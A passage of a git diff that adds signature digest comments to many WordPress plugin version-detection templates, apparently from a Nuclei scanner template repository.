490a004630440220744df0cb20140b539c6101dc7482d2bba305e9d85d8c069a502368ddb4671a4402203de8ab89b46bf1743f2681f616bafa628508834bec0830094b8947016a1b3a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..dd4b805142 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206fce741fb20bde0d8f9104f9c12c48d57c23e38dcb273a68d73d077c49aa4a09022100ad4efb927d43c3c6bc2037b3c48128a21f7f8272aff202bfbc7ea16413f91f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..e381b34c91 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d207da09656752159fe9d96f565d5c5ba1e653f55595acba44e1593532730ca6022045a93b5fae90609e1d7a962d5009b7d5724b751466cd04e6625fcc8199af4c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..720331293d 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022033384196f5dbadcde1bf5bd7693aac831f04b34038a487b183a1f811808245360220443f8c5067a1eae81dd363fb78a2eb2500a34695a23596e96765ddf2581aeb22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..588169f6a9 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c77cb46a8b6fff1e69e361286e81481729b851aefeefb65df6edfaa107a6df3b022100c92a9ec5bf7d29cd71c5e47c078ae7b488e8a4d46c18113afe8b4fabae7ad18e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..1e86b9eb8b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200e8cdcf6f67b46bbf8c24dc64c2060f55419197e2f47d5e27185bdc7eca41ca0022100cec20f12fffe989f0cf442d243bc5a0662d40b283edb9213d2c0b8a1e2835aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b6f392efba..f1d5a70eb4 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022031c9bcad3eb516e9a5830ec73445304e034fa5a553a0c414d9991d90972a09bc022100a5ca622e3d51f2919635c7b34fca48e3f979c1f5baf5b8a52b30ab1787c5ebf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..f60afb652f 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e00947449558922041773cd8546e16ff13c92db507ac531216e9af8db1bddc32022077b06539271a1d9d526f4e83c61a9d6b4df075805ef78c489b4b2bb71a15297e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..b43285876b 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203caa2599078e93a074fe06ef93d12a8527a7dab8c817a449be322de319cdd07502206bf223bede9fff2e3178a2eb02454727a560d9e3ee60bbffeb5c37f4fc0f50da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..0575b928fa 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210083315530e91bfe33ebf42235babb88459eed0211b88a24429a84dcd7e0400857022100e1612b62293f34e1d87b6a497dd158cca28d73924bff5b807d851375b913ea6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..b8dd6b02cf 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a8222a8577c078b18bca24e79c6a82ef760dbb9de43976e195bfc512441f7e660220352b75ee36162817c513d936de404395f50e14b3266e59b845f32cfe15902d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..3ac1ad5ae6 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220113656452742836eb4f80f9a169ab2be3af5f42863810f09b469377eda69414b022100c874b8ccc4223632ea0af3e106258e4d50a50d1b991edd31e527729b85fe71db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..3235262ecd 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008b7c0a327a636bf1da8f2cb17f01033e75775a3d1a59207d1d5b47861ab16eab0220064fd122efe126f63d8cec32819dd77e49be64d4c0b8cb74d3abe94d1600c094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..54e27cfd3e 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022045ee8aa5ad7fc46e140d8b40c3b68a01f6032f1a98ae3f751a63dffac39fc5760221008f625d5fb38f695d819f30519907a86797af7ef88b05b47102b3d4f7cfdd37c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..eb008b657a 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022047973994aa7703ac56c1aec85236c4c905830de3fd970240cd064f0929f03309022010e8d0cfddad12e2f55b604f95a6c8bd5d0c5e8c9e4874073edf3e0ae15dd1bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..4b2bad3729 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203cb076c53608617dcc4e00b7201d624f36522c287457d14b5e6cb5577b4fc2120221008d0fe4836b5ac5103072050253556679669803230386cfde4a28a3d94751ff51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..8f6d430329 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ba3f4e4559c3f037bd7c55563527844c6a1ed973aac72e5cbb27506c648312f3022100ebcc55b4b3742421aefbedd0d779e3276972f68f9f48f3c06b4855eb0621a515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..4ac9dc7d89 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204fd9c435542dbebde27c51ef23747bc5249f4076672bad3052fde004c10c2060022100f866d9db4cc2295d7497fab35017f7fbb97491b5c4f7959c1ae867191c5f35d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..cb16d17345 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100dfe292a89bbf1de8902d6ff146b15b061b9d38aca0fe205ab5fa2c4f73946717022100a352968540cbfb35aedf2cf69570ba5e1482adb648eb6a4679a96772f7ac1f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..c8e8a3f5ed 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210089f1a4d0212e9a93484a025e7c19934d2ce50b12a51f27848f59a1d7ae1e6db1022100e7fc4173d609a84e9d48754573b13c81182e685537bd7c4a96654875b28b4ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..bf2f08407c 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206c8cd36f7fba83ede9e9709254fa9da7e67b5e95ab5b8781ebeab8e5d1566d2b02202e81fd0344b2b1ee1f8ab9f303ba7666380b2aa4544bc93620721a070d6b98d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..68fa285170 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e52c49e4b301547f69e0f2f1989e344e534d8d1ed72237afec9f71a56c9cb346022100f4cfd461340ac7fa9dca96b09b1bb0412961ff69353b3de60a60c5a980d8ba47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..59aa10b524 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022012656ea87c8f79b4a80c579ae4fe8253dc98a82269d52063896efecc5578ccdd02205ec7fcc3684301744e5c31df20c256ab678bdd59bf51629d4d3fb54e7defca3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..fd94faa51e 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dc806e6bece78f1152245f985b0f4f201106bdf6fe64d3515d64240e4398da2002200a4d85688feec1a0eb43dd6bd47503f544004f6a81ffc644f5af0221fdc7ae30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..5ab5297c85 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e0adcf0171f78f2e84e6271ee382ba910050fcfb50da2770247f7221214f8eb602205d90b83415c9b648fbca7f7a874402457f9c66c58a040824f4bf60dfdc9a7266:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..2d5a136c35 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220698ff7072d3afd1cc588d2136e058aaffbfb131157c89ffb9cb426a30acbafd2022100dd3235b09d7086e7580820c47a6605936b8884b474b65a848f906c41292bd88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..74f189ca19 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201f70405550e966e80be07c7a7f3c8e4d0d419b2fabc768a29dae505e6d66e7be022100fb334e3d43d9efb1873db58438422b111d03987400eb3daf64aba5cf8c325233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..9a0e8a8bf0 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201e742ba64e3c979b119f38b302479a07d6e39eb5c38b10d231b4301f7e596188022100812d82d72c0251e8d902ec13ab4bb402fde8f641d7beafc5fb7bdeef882590ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..44cf1731d7 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100cdb5c9e45f77df844884ba4bbd2e7671232711658834fe3fe762b80b95ea9fa402203cdc0b587a210e0fe069c01724412b9abdb31d8a6f88365ba32a5ffd99886928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..75c9c60e36 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100922454326dfc181ee07fbe4a71fd3e3464a5cfab29ccd6f5a156cd0b1aa77ff802206326792f94273c2005c2271c8eec98bb5ae8589eb314ee3722e4d8aa524905b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..9092bfaece 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022020858e7fb3c882d2e23d27dd4335df9eb7e52a132048b0caab7cc1d38fb4406d02206be2ab5e8ec31324a96a3e8a8b2c4042f1109955d9994cd5dc1b0dab7a0e5552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..2f6a0f8521 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d829a4994ab6256d0b3239d9031b4208af7344267ae25064776ed1fe8b6c5e9402200b00edd18d8b37846e9568e243d09dc0806572bac5eaa920f09707ccf8a26d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..3870810426 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e0aec076b5b392a6b8371ee8bed4639ebeb30d6333ce37d15898d17ff272165e0221008554e8058b8b3139e9aca3c667b942340433c472509b5310bcafbfa555405538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..8ae8225cc6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022044e094a30ff9cc02b25043ba5e5e9f62157e2cfe62f065ceb1a513dd12f621c40221008f76f2735cd06d9608869d94831d1e5fcd74cfb3c8bea4d60f78bc1ba8f8f29d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..fd86741f84 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fea3cefac53fba24da845dae34d4738235e6beffd6904254092759b8865c88d3022100b0692c25f982dff5a798e4be827cae5a169dd498b775a8782c2c6a69cc6a35bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..b9ba10fdad 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204881d5bc172ce5b6430b7bf6dda8cd92281d1ce8c5d9b5f2f60106f674416f940220172417ebba949a0ce9ba5ca574e8c2467b1b3ae2fcd910d20c7449c4f4018b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..078dbacb6a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202fddfff79d20f64c54d0b473099fe9dd3d028916900e8b898d6594b5d008575f022100a67e6bd24c57bd8b8cf2b8c2de5bdc3a58738283130e39e0c87bb7e267010c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..5b56fc4d5e 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100bd471df62b98cc18fe45c7c5ed951a38b24aaeb78b835ccc23e666c96620f6f602203360e485707b1e8be25d4984f3475b5ed909df79bd14dc6585c5a512f98f53e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..8049dc0c2b 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203618bd1ac690a55846b298426faf4fb37ebcf08e68225eb16842bd735b5419f702205ba32df6c06ac2ace2ae3955061fc606375f985b8155a5a66be5a129e5a0e8c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..13b0522e60 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022021a75005159393cf7541206dbffa4b78cd4eb2fff4fecaa958e8c44a39131085022072f2c43d4b0bde547eca40dc813eda79e01c2f78e94115bc5a7e6a77c89e887b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..7c1172a93d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022033e74fcbeddb157f3fc8d5b20c57b0028e985b1e47510825e19d626795747899022100bbf5715b4e58f83af8e417be09a018dff1bb56023e454e4a6af9dfd201314f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..4929d1a352 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220115c0a651b4b609494e8cfb958e52b22fb111c8615fca309d8196c4fe423a5b10220603faf10c961ff5360bb7ea1b4dbe6e1c3374d69f5839ad098607f78ea029968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..6db7bb8a26 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f53641b0b609f68f3466c77a805853acbd863dd98671f584e9ebb9e7a2055925022100c028674bad3ba9d5ecb9ba5c7779e409f81b18cf6a17925ca1b2ff7d64ea629a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..701800a13b 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c6de9fa165287c475bf64a3a3182f1cf49b5db97560456ce79fd149c0df82d2602203fe77d65caeda756bdc82d34a5c5f943cc92b7abf5334fb64f7e49d9e145b8db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..44d136542a 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204e3d3cf0e6774b96c795a7db628a621e4d733cda08340000a189c0be4a73cf3902210097ef5d7a9ef38469504fd853f63eb0639382ecbd6cd1b9cf4f3e67ac5d710851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..0904210c2f 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207582fe63d5b70f8d6702ca1cbd0dd7d2bdcdd5118498bcf2d400682014236a2902206a5d67b426c35b83896bc7ba58b309861e821f09fa17a8d66f1d2a4fc1cbea1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index dc18db23b1..ff9eb7c4c6 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 